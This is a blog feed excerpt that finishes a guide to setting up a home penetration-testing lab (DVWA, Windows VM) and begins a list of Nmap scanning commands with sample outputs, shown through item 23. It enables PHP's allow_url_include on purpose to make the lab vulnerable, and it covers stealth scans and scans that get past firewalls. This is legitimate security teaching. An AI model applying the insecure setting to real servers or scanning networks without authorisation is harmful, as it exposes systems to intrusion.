<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5384 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/First-start-the-service.png" sizes="auto, (max-width: 453px) 100vw, 453px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/First-start-the-service.png 453w, https://www.ehacking.net/wp-content/uploads/2020/02/First-start-the-service-300x54.png 300w" alt="First start the service" width="453" height="81">Switch to the directory /etc/php/7.3/apache2/ where the configuration file is present that we have to configure</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5385 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Switch-to-the-directory.png" sizes="auto, (max-width: 502px) 100vw, 502px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Switch-to-the-directory.png 502w, https://www.ehacking.net/wp-content/uploads/2020/02/Switch-to-the-directory-300x97.png 300w" alt="Switch to the directory" width="502" height="163"></p>
<p>Type ls to see the file i.e. php.ini</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5386 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Type-ls-to-see-the-file-i.e.-php.ini_.png" sizes="auto, (max-width: 450px) 100vw, 450px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Type-ls-to-see-the-file-i.e.-php.ini_.png 450w, https://www.ehacking.net/wp-content/uploads/2020/02/Type-ls-to-see-the-file-i.e.-php.ini_-300x69.png 300w" alt="" width="450" height="103"></p>
<p>Use the editor to set the configuration in the php.ini file. I am using gedit editor</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5387 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Use-editor-to-set-the-configuration-in-the-php.ini-file.-I-am-using-gedit-editor.png" sizes="auto, (max-width: 616px) 100vw, 616px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Use-editor-to-set-the-configuration-in-the-php.ini-file.-I-am-using-gedit-editor.png 616w, https://www.ehacking.net/wp-content/uploads/2020/02/Use-editor-to-set-the-configuration-in-the-php.ini-file.-I-am-using-gedit-editor-300x119.png 300w" alt="" width="616" height="245">Set the two highlighted parameter on i.e. allow_url_fopen = On and allow_url_include = On</p>
<p>Save the file, exit the editor and then start the apache service</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5388 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Save-the-file-exit-the-editor-and-then-start-the-apache-service.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Save-the-file-exit-the-editor-and-then-start-the-apache-service.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Save-the-file-exit-the-editor-and-then-start-the-apache-service-300x118.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Save-the-file-exit-the-editor-and-then-start-the-apache-service-768x301.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Save-the-file-exit-the-editor-and-then-start-the-apache-service-696x273.png 696w" alt="Save the file, exit the editor and then start the apache service " width="975" height="382"></p>
<p>Now open the browser and access the web application by typing 127.0.0.1/DVWA/ (because we are running this application on a local server)</p>
<p>When accessing the application for the first time you will be redirected to this setup page where it is showing the configuration of web application</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5389 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/configuration-of-web-application.png" sizes="auto, (max-width: 902px) 100vw, 902px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/configuration-of-web-application.png 902w, https://www.ehacking.net/wp-content/uploads/2020/02/configuration-of-web-application-300x213.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/configuration-of-web-application-768x544.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/configuration-of-web-application-696x493.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/configuration-of-web-application-593x420.png 593w, https://www.ehacking.net/wp-content/uploads/2020/02/configuration-of-web-application-100x70.png 100w" alt="configuration of web application " width="902" height="639">Scroll down and select “Create/Reset Database” to create a database</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5390 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Scroll-down-and-select-“Create-Reset-Database”-to-create-a-database.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Scroll-down-and-select-“Create-Reset-Database”-to-create-a-database.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Scroll-down-and-select-“Create-Reset-Database”-to-create-a-database-300x133.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Scroll-down-and-select-“Create-Reset-Database”-to-create-a-database-768x341.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Scroll-down-and-select-“Create-Reset-Database”-to-create-a-database-696x309.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/Scroll-down-and-select-“Create-Reset-Database”-to-create-a-database-946x420.png 946w" alt="Scroll down and select “Create Reset Database” to create a database" width="975" height="433">Now finally you will see a login page of DVWA that requires credentials to enter. Default username is “admin” and password is “password”</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5391 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Default-username.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Default-username.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Default-username-300x210.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Default-username-768x537.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Default-username-696x487.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/Default-username-600x420.png 600w, https://www.ehacking.net/wp-content/uploads/2020/02/Default-username-100x70.png 100w" alt="" width="975" height="682"></p>
<p>After logging in you will see a home page of DVWA that is showing some instructions and warnings. In the left-most corner, there are different vulnerabilities showing that can be exploited.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5392 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/instructions-and-warnings.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/instructions-and-warnings.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/instructions-and-warnings-300x213.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/instructions-and-warnings-768x544.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/instructions-and-warnings-696x493.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/instructions-and-warnings-593x420.png 593w, https://www.ehacking.net/wp-content/uploads/2020/02/instructions-and-warnings-100x70.png 100w" alt="instructions and warnings" width="975" height="691"></p>
<h2><strong>Windows</strong></h2>
<p>The third target machine is set to be Windows 10 as we will create an environment that will target Linux as well as Microsoft operating system.</p>
<p>Creating Windows VM in VirtualBox is easy because we don’t need to have a product key and can download the ISO file from Microsoft using the&nbsp;<strong>Windows Media creation tool. </strong></p>
<p><strong>Go to the </strong><strong>link <a href="https://www.microsoft.com/en-us/software-download/windows10">https://www.microsoft.com/en-us/software-download/windows10</a> </strong>and select ‘Download tool now’ option</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5393 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Download-tool-now.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Download-tool-now.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Download-tool-now-300x135.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Download-tool-now-768x347.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Download-tool-now-696x314.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/Download-tool-now-931x420.png 931w" alt="Download tool now" width="975" height="440"></p>
<p>Download the ISO file from here and then create a VM on VirtualBox:</p>
<ol>
<li>Set name, destination, type, and version</li>
<li>Set the memory size</li>
<li>Create the virtual hard drive</li>
<li>Set hard disk file type as VDI</li>
<li>Set storage on a physical device as dynamically allocated</li>
<li>Select the size of virtual hard disk</li>
<li>From settings go to Storage tab and select Controller: IDE, select Empty and from the rightmost corner select the tiny CD icon from where you can browse the ISO file that you have downloaded on your PC. Select the image file</li>
<li>Start the VM and configure</li>
</ol>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5394 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/Download-the-ISO-file-from-here-and-then-create-a-VM-on-VirtualBox.png" sizes="auto, (max-width: 975px) 100vw, 975px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/Download-the-ISO-file-from-here-and-then-create-a-VM-on-VirtualBox.png 975w, https://www.ehacking.net/wp-content/uploads/2020/02/Download-the-ISO-file-from-here-and-then-create-a-VM-on-VirtualBox-300x224.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/Download-the-ISO-file-from-here-and-then-create-a-VM-on-VirtualBox-768x573.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/Download-the-ISO-file-from-here-and-then-create-a-VM-on-VirtualBox-696x520.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/Download-the-ISO-file-from-here-and-then-create-a-VM-on-VirtualBox-563x420.png 563w, https://www.ehacking.net/wp-content/uploads/2020/02/Download-the-ISO-file-from-here-and-then-create-a-VM-on-VirtualBox-80x60.png 80w, https://www.ehacking.net/wp-content/uploads/2020/02/Download-the-ISO-file-from-here-and-then-create-a-VM-on-VirtualBox-265x198.png 265w" alt="Download the ISO file from here and then create a VM on VirtualBox" width="975" height="728"></p>
<p>So we have created all the VMs and set up the penetration testing environment successfully!</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-5395 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/02/So-we-have-created-all-the-VMs-and-set-up-the-penetration-testing-environment-successfully.png" sizes="auto, (max-width: 833px) 100vw, 833px" srcset="https://www.ehacking.net/wp-content/uploads/2020/02/So-we-have-created-all-the-VMs-and-set-up-the-penetration-testing-environment-successfully.png 833w, https://www.ehacking.net/wp-content/uploads/2020/02/So-we-have-created-all-the-VMs-and-set-up-the-penetration-testing-environment-successfully-300x152.png 300w, https://www.ehacking.net/wp-content/uploads/2020/02/So-we-have-created-all-the-VMs-and-set-up-the-penetration-testing-environment-successfully-768x389.png 768w, https://www.ehacking.net/wp-content/uploads/2020/02/So-we-have-created-all-the-VMs-and-set-up-the-penetration-testing-environment-successfully-696x353.png 696w, https://www.ehacking.net/wp-content/uploads/2020/02/So-we-have-created-all-the-VMs-and-set-up-the-penetration-testing-environment-successfully-829x420.png 829w" alt="" width="833" height="422"></p>
<p>Use Kali Linux to scan the target and exploit many vulnerabilities present in DVWA, MetaSploitable, and Windows machines, generate some attacks for example: Brute Force, SQL Injection, CSRF, and many more to let you start your Capture the Flag journey.</p>
</div>
<p>The post <a href="http://kostacipo.stream/how-to-create-a-virtual-penetration-testing-lab-at-home/">How To Create A Virtual Penetration Testing Lab At Home</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/how-to-create-a-virtual-penetration-testing-lab-at-home/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Top 32 Nmap Commands For Linux Sys/Network Admins</title>
		<link>http://kostacipo.stream/top-32-nmap-commands-for-linux-sys-network-admins/</link>
					<comments>http://kostacipo.stream/top-32-nmap-commands-for-linux-sys-network-admins/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Thu, 23 Jan 2020 13:30:06 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Pentesting]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[nmap]]></category>
		<category><![CDATA[pentest]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1693</guid>

					<description><![CDATA[<p>&#160; Nmap is short for Network Mapper. It is an open source security tool for network exploration, security scanning and auditing. However, nmap command comes with lots of options that can make the utility more robust and difficult to follow for new users. The purpose of this post is to introduce a user to the [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/top-32-nmap-commands-for-linux-sys-network-admins/">Top 32 Nmap Commands For Linux Sys/Network Admins</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>&nbsp;</p>
<p><span class="drop_cap">N</span>map is short for Network Mapper. It is an open source security tool for network exploration, security scanning and auditing. However, nmap command comes with lots of options that can make the utility more robust and difficult to follow for new users. The purpose of this post is to introduce a user to the nmap command line tool to scan a host and/or network, so to find out the possible vulnerable points in the hosts. You will also learn how to use Nmap for offensive and defensive purposes.</p>
<p>Let us see some common nmap command examples.</p>
<p><center></center></p>
<figure id="attachment_276" class="wp-caption aligncenter" aria-describedby="caption-attachment-276"><a href="https://www.cyberciti.biz/networking/nmap-command-examples-tutorials/attachment/welcome-nmap/" rel="attachment wp-att-276"><img loading="lazy" decoding="async" class="size-full wp-image-276" title="Nmap Tutorial / Examples PDF Download" src="https://www.cyberciti.biz/media/new/cms/2012/11/welcome-nmap.png" sizes="auto, (max-width: 593px) 85vw, 593px" srcset="https://www.cyberciti.biz/media/new/cms/2012/11/welcome-nmap.png 593w, https://www.cyberciti.biz/media/new/cms/2012/11/welcome-nmap-300x223.png 300w" alt="nmap in action" width="593" height="441"></a><figcaption id="caption-attachment-276" class="wp-caption-text"><em>nmap in action</em></figcaption></figure>
<h2>What is Nmap and what is it used for?</h2>
<p>From the man page:</p>
<blockquote>
<p>Nmap (“Network Mapper”) is an open source tool for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. While Nmap is commonly used for security audits, many systems and network administrators find it useful for routine tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.</p>
</blockquote>
<p>It was originally written by Gordon Lyon and it can answer the following questions easily:</p>
<ol>
<li>What computers did you find running on the local network?</li>
<li>What IP addresses did you find running on the local network?</li>
<li>What is the operating system of your target machine?</li>
<li>Find out what ports are open on the machine that you just scanned?</li>
<li>Find out if the system is infected with malware or virus.</li>
<li>Search for unauthorized servers or network service on your network.</li>
<li>Find and remove computers which don’t meet the organization’s minimum level of security.</li>
</ol>
<h2>Sample setup (LAB)</h2>
<p>Port scanning may be illegal in some jurisdictions. So setup a lab as follows:</p>
<pre>                              +---------+
        +---------+           | Network |         +--------+
        | server1 |-----------+ swtich  +---------|server2 |
        +---------+           | (sw0)   |         +--------+
                              +----+----+
                                   | 
                                   |
                         +---------+----------+
                         | wks01 Linux/OSX    |
                         +--------------------+
</pre>
<p>Where,</p>
<ul>
<li>wks01 is your computer either running Linux/OS X or Unix like operating system. It is used for scanning your local network. The nmap command must be installed on this computer.</li>
<li>server1 can be powered by Linux / Unix / MS-Windows operating systems. This is an unpatched server. Feel free to install a few services such as a web-server, file server and so on.</li>
<li>server2 can be powered by Linux / Unix / MS-Windows operating systems. This is a&nbsp;<a title="See how to setup Linux firewall" href="https://www.cyberciti.biz/tips/linux-iptables-examples.html">fully patched server with firewall</a>. Again, feel free to install few services such as a web-server, file server and so on.</li>
<li>All three systems are connected via switch.</li>
</ul>
<h2>#1: Scan a single host or an IP address (IPv4)</h2>
<div class="wp_syntax">
<table>
<tbody>
<tr>
<td class="code">
<pre class="bash">### Scan a single ip address ###
nmap 192.168.1.1
&nbsp;
## Scan a host name ###
nmap server1.cyberciti.biz
&nbsp;
## Scan a host name with more info###
nmap -v server1.cyberciti.biz</pre>
</td>
</tr>
</tbody>
</table>
</div>
<p>&nbsp;</p>
<p><em>Sample outputs:</em></p>
<figure class="wp-caption alignnone"><a href="https://www.cyberciti.biz/faq/howto-install-nmap-on-centos-rhel-redhat-enterprise-linux/"><img loading="lazy" decoding="async" title="Fig.01: nmap output" src="https://s0.cyberciti.org/uploads/faq/2012/11/redhat-nmap-command-output.png" alt="Fig.01: nmap output" width="592" height="176"></a><figcaption class="wp-caption-text"><em>Fig.01: nmap output</em></figcaption></figure>
<h2>#2: Scan multiple IP address or subnet (IPv4)</h2>
<pre>nmap 192.168.1.1 192.168.1.2 192.168.1.3
## works with same subnet i.e. 192.168.1.0/24 
nmap 192.168.1.1,2,3
</pre>
<p>You can scan a range of IP address too:</p>
<pre>nmap 192.168.1.1-20</pre>
<p>You can scan a range of IP address using a wildcard:</p>
<pre>nmap 192.168.1.*</pre>
<p>Finally, you scan an entire subnet:</p>
<pre>nmap 192.168.1.0/24</pre>
<h2>#3: Read list of hosts/networks from a file (IPv4)</h2>
<p>The -iL option allows you to read the list of target systems using a text file. This is useful to scan a large number of hosts/networks. Create a text file as follows:<br /><code>cat &gt; /tmp/test.txt</code></p>
<p><em>Sample outputs:</em></p>
<pre>server1.cyberciti.biz
192.168.1.0/24
192.168.1.1/24
10.1.2.3
localhost
</pre>
<p>The syntax is:</p>
<pre>nmap -iL /tmp/test.txt</pre>
<h2>#4: Excluding hosts/networks (IPv4)</h2>
<p>When scanning a large number of hosts/networks you can exclude hosts from a scan:</p>
<pre>nmap 192.168.1.0/24 --exclude 192.168.1.5
nmap 192.168.1.0/24 --exclude 192.168.1.5,192.168.1.254</pre>
<p>OR exclude list from a file called /tmp/exclude.txt</p>
<pre>nmap -iL /tmp/scanlist.txt --excludefile /tmp/exclude.txt</pre>
<h2>#5: Turn on OS and version detection scanning script (IPv4)</h2>
<pre>nmap -A 192.168.1.254
nmap -v -A 192.168.1.1
nmap -A -iL /tmp/scanlist.txt </pre>
<h2>#6: Find out if a host/network is protected by a firewall</h2>
<pre>nmap -sA 192.168.1.254
nmap -sA server1.cyberciti.biz</pre>
<h2>#7: Scan a host when protected by the firewall</h2>
<pre>nmap -PN 192.168.1.1
nmap -PN server1.cyberciti.biz</pre>
<h2>#8: Scan an IPv6 host/address</h2>
<p>The&nbsp;<kbd>-6</kbd>&nbsp;option enable IPv6 scanning. The syntax is:</p>
<pre>nmap -6 IPv6-Address-Here
nmap -6 server1.cyberciti.biz
nmap -6 2607:f0d0:1002:51::4
nmap -v A -6 2607:f0d0:1002:51::4</pre>
<h2>#9: Scan a network and find out which servers and devices are up and running</h2>
<p>This is known as host discovery or ping scan:</p>
<pre>nmap -sP 192.168.1.0/24</pre>
<p><em>Sample outputs:</em></p>
<pre>Host 192.168.1.1 is up (0.00035s latency).
MAC Address: BC:AE:C5:C3:16:93 (Unknown)
Host 192.168.1.2 is up (0.0038s latency).
MAC Address: 74:44:01:40:57:FB (Unknown)
Host 192.168.1.5 is up.
Host nas03 (192.168.1.12) is up (0.0091s latency).
MAC Address: 00:11:32:11:15:FC (Synology Incorporated)
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.80 second</pre>
<h2>#10: How do I perform a fast scan?</h2>
<pre>nmap -F 192.168.1.1</pre>
<h2>#11: Display the reason a port is in a particular state</h2>
<pre>nmap --reason 192.168.1.1
nmap --reason server1.cyberciti.biz</pre>
<h2>#12: Only show open (or possibly open) ports</h2>
<pre>nmap --open 192.168.1.1
nmap --open server1.cyberciti.biz</pre>
<h2>#13: Show all packets sent and received</h2>
<pre>nmap --packet-trace 192.168.1.1
nmap --packet-trace server1.cyberciti.biz</pre>
<h2>14#: Show host interfaces and routes</h2>
<p>This is useful for debugging (<a href="https://www.cyberciti.biz/faq/howto-linux-configuring-default-route-with-ipcommand/">ip command</a>&nbsp;or&nbsp;<a href="https://www.cyberciti.biz/faq/what-is-a-routing-table/">route command</a>&nbsp;or&nbsp;<a href="https://www.cyberciti.biz/faq/linux-unix-open-ports/">netstat command</a>&nbsp;like output using nmap)</p>
<pre>nmap --iflist</pre>
<p><em>Sample outputs:</em></p>
<div class="wp_syntax">
<table>
<tbody>
<tr>
<td class="code">
<pre class="ini">Starting Nmap 5.00 ( http://nmap.org ) at 2012-11-27 02:01 IST
************************INTERFACES************************
DEV    (SHORT)  IP/MASK          TYPE        UP MAC
lo     (lo)     127.0.0.1/8      loopback    up
eth0   (eth0)   192.168.1.5/24   ethernet    up B8:AC:6F:65:31:E5
vmnet1 (vmnet1) 192.168.121.1/24 ethernet    up 00:50:56:C0:00:01
vmnet8 (vmnet8) 192.168.179.1/24 ethernet    up 00:50:56:C0:00:08
ppp0   (ppp0)   10.1.19.69/32    point2point up
&nbsp;
**************************ROUTES**************************
DST/MASK         DEV    GATEWAY
10.0.31.178/32   ppp0
209.133.67.35/32 eth0   192.168.1.2
192.168.1.0/0    eth0
192.168.121.0/0  vmnet1
192.168.179.0/0  vmnet8
169.254.0.0/0    eth0
10.0.0.0/0       ppp0
0.0.0.0/0        eth0   192.168.1.2</pre>
</td>
</tr>
</tbody>
</table>
</div>
<h2>#15: How do I scan specific ports?</h2>
<div class="wp_syntax">
<table>
<tbody>
<tr>
<td class="code">
<pre class="bash">nmap -p [port] hostName
## Scan port 80
nmap -p 80 192.168.1.1
&nbsp;
## Scan TCP port 80
nmap -p T:80 192.168.1.1
&nbsp;
## Scan UDP port 53
nmap -p U:53 192.168.1.1
&nbsp;
## Scan two ports ##
nmap -p 80,443 192.168.1.1
&nbsp;
## Scan port ranges ##
nmap -p 80-200 192.168.1.1
&nbsp;
## Combine all options ##
nmap -p U:53,111,137,T:21-25,80,139,8080 192.168.1.1
nmap -p U:53,111,137,T:21-25,80,139,8080 server1.cyberciti.biz
nmap -v -sU -sT -p U:53,111,137,T:21-25,80,139,8080 192.168.1.254
&nbsp;
## Scan all ports with * wildcard ##
nmap -p "*" 192.168.1.1
&nbsp;
## Scan top ports i.e. scan $number most common ports ##
nmap --top-ports 5 192.168.1.1
nmap --top-ports 10 192.168.1.1</pre>
</td>
</tr>
</tbody>
</table>
</div>
<p>&nbsp;</p>
<p><em>Sample outputs:</em></p>
<div class="wp_syntax">
<table>
<tbody>
<tr>
<td class="code">
<pre class="ini">Starting Nmap 5.00 ( http://nmap.org ) at 2012-11-27 01:23 IST
Interesting ports on 192.168.1.1:
PORT     STATE  SERVICE
21/tcp   closed ftp
22/tcp   open   ssh
23/tcp   closed telnet
25/tcp   closed smtp
80/tcp   open   http
110/tcp  closed pop3
139/tcp  closed netbios-ssn
443/tcp  closed https
445/tcp  closed microsoft-ds
3389/tcp closed ms-term-serv
MAC Address: BC:AE:C5:C3:16:93 (Unknown)
&nbsp;
Nmap done: 1 IP address (1 host up) scanned in 0.51 seconds</pre>
</td>
</tr>
</tbody>
</table>
</div>
<h2>#16: The fastest way to scan all your devices/computers for open ports ever</h2>
<pre>nmap -T5 192.168.1.0/24</pre>
<h2>#17: How do I detect remote operating system?</h2>
<p>You can&nbsp;identify a remote host apps and OS using the -O option:</p>
<div class="wp_syntax">
<table>
<tbody>
<tr>
<td class="code">
<pre class="bash">nmap -O 192.168.1.1
nmap -O  --osscan-guess 192.168.1.1
nmap -v -O --osscan-guess 192.168.1.1</pre>
</td>
</tr>
</tbody>
</table>
</div>
<p>&nbsp;</p>
<p><em>Sample outputs:</em></p>
<pre>Starting Nmap 5.00 ( http://nmap.org ) at 2012-11-27 01:29 IST
NSE: Loaded 0 scripts for scanning.
Initiating ARP Ping Scan at 01:29
Scanning 192.168.1.1 [1 port]
Completed ARP Ping Scan at 01:29, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:29
Completed Parallel DNS resolution of 1 host. at 01:29, 0.22s elapsed
Initiating SYN Stealth Scan at 01:29
Scanning 192.168.1.1 [1000 ports]
Discovered open port 80/tcp on 192.168.1.1
Discovered open port 22/tcp on 192.168.1.1
Completed SYN Stealth Scan at 01:29, 0.16s elapsed (1000 total ports)
Initiating OS detection (try #1) against 192.168.1.1
Retrying OS detection (try #2) against 192.168.1.1
Retrying OS detection (try #3) against 192.168.1.1
Retrying OS detection (try #4) against 192.168.1.1
Retrying OS detection (try #5) against 192.168.1.1
Host 192.168.1.1 is up (0.00049s latency).
Interesting ports on 192.168.1.1:
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: BC:AE:C5:C3:16:93 (Unknown)
Device type: WAP|general purpose|router|printer|broadband router
Running (JUST GUESSING) : Linksys Linux 2.4.X (95%), Linux 2.4.X|2.6.X (94%), MikroTik RouterOS 3.X (92%), Lexmark embedded (90%), Enterasys embedded (89%), D-Link Linux 2.4.X (89%), Netgear Linux 2.4.X (89%)
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (95%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (94%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (94%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Linux 2.6.15 - 2.6.23 (embedded) (92%), Linux 2.6.15 - 2.6.24 (92%), MikroTik RouterOS 3.0beta5 (92%), MikroTik RouterOS 3.17 (92%), Linux 2.6.24 (91%), Linux 2.6.22 (90%)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=5.00%D=11/27%OT=22%CT=1%CU=30609%PV=Y%DS=1%G=Y%M=BCAEC5%TM=50B3CA
OS:4B%P=x86_64-unknown-linux-gnu)SEQ(SP=C8%GCD=1%ISR=CB%TI=Z%CI=Z%II=I%TS=7
OS:)OPS(O1=M2300ST11NW2%O2=M2300ST11NW2%O3=M2300NNT11NW2%O4=M2300ST11NW2%O5
OS:=M2300ST11NW2%O6=M2300ST11)WIN(W1=45E8%W2=45E8%W3=45E8%W4=45E8%W5=45E8%W
OS:6=45E8)ECN(R=Y%DF=Y%T=40%W=4600%O=M2300NNSNW2%CC=N%Q=)T1(R=Y%DF=Y%T=40%S
OS:=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%R
OS:D=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=
OS:0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID
OS:=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 12.990 days (since Wed Nov 14 01:44:40 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=200 (Good luck!)
IP ID Sequence Generation: All zeros
Read data files from: /usr/share/nmap
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.38 seconds
           Raw packets sent: 1126 (53.832KB) | Rcvd: 1066 (46.100KB)
</pre>
<p>See also:&nbsp;<a href="https://www.cyberciti.biz/faq/find-out-remote-webserver-name/">Fingerprinting a web-server</a>&nbsp;and a&nbsp;<a href="https://www.cyberciti.biz/tips/howto-remotely-determine-dns-server-version.html">dns server</a>&nbsp;command line tools for more information.</p>
<h2>#18: How do I detect remote services (server / daemon) version numbers?</h2>
<pre>nmap -sV 192.168.1.1</pre>
<p><em>Sample outputs:</em></p>
<pre>Starting Nmap 5.00 ( http://nmap.org ) at 2012-11-27 01:34 IST
Interesting ports on 192.168.1.1:
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     <strong>Dropbear sshd 0.52 (protocol 2.0)</strong>
80/tcp open  http?
1 service unrecognized despite returning data.
</pre>
<h2>#19: Scan a host using TCP ACK (PA) and TCP Syn (PS) ping</h2>
<p>If firewall is blocking standard ICMP pings, try the following host discovery methods:</p>
<pre>nmap -PS 192.168.1.1
nmap -PS 80,21,443 192.168.1.1
nmap -PA 192.168.1.1
nmap -PA 80,21,200-512 192.168.1.1</pre>
<h2>#20: Scan a host using IP protocol ping</h2>
<pre>nmap -PO 192.168.1.1</pre>
<h2>#21: Scan a host using UDP ping</h2>
<p>This scan bypasses firewalls and filters that only screen TCP:</p>
<pre>nmap -PU 192.168.1.1
nmap -PU 2000.2001 192.168.1.1</pre>
<h2>#22: Find out the most commonly used TCP ports using TCP SYN Scan</h2>
<div class="wp_syntax">
<table>
<tbody>
<tr>
<td class="code">
<pre class="bash">### Stealthy scan ###
nmap -sS 192.168.1.1
&nbsp;
### Find out the most commonly used TCP ports using  TCP connect scan (warning: no stealth scan)
###  OS Fingerprinting ###
nmap -sT 192.168.1.1
&nbsp;
### Find out the most commonly used TCP ports using TCP ACK scan
nmap -sA 192.168.1.1
&nbsp;
### Find out the most commonly used TCP ports using TCP Window scan
nmap -sW 192.168.1.1
&nbsp;
### Find out the most commonly used TCP ports using TCP Maimon scan
nmap -sM 192.168.1.1</pre>
</td>
</tr>
</tbody>
</table>
</div>
<h2>#23: Scan a host for UDP services (UDP scan)</h2>
<p>Most popular services on the Internet run over the TCP protocol. DNS, SNMP, and DHCP are three of the most common UDP services. Use the following syntax to find out UDP services:</p>
<pre>nmap -sU nas03
nmap -sU 192.168.1.1</pre>
<p><em>Sample outputs:</em></p>
<div class="wp_syntax">
<table>
<tbody>
<tr>
<td class="code">
<pre class="ini">Starting Nmap 5.00 ( http://nmap.org ) at 2012-11-27 00:52 IST
Stats: 0:05:29 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 32.49% done; ETC: 01:09 (0:11:26 remaining)
Interesting ports on nas03 (192.168.1.12):
Not shown: 995 closed ports
PORT     STATE         SERVICE
111/udp  open|filtered rpcbind
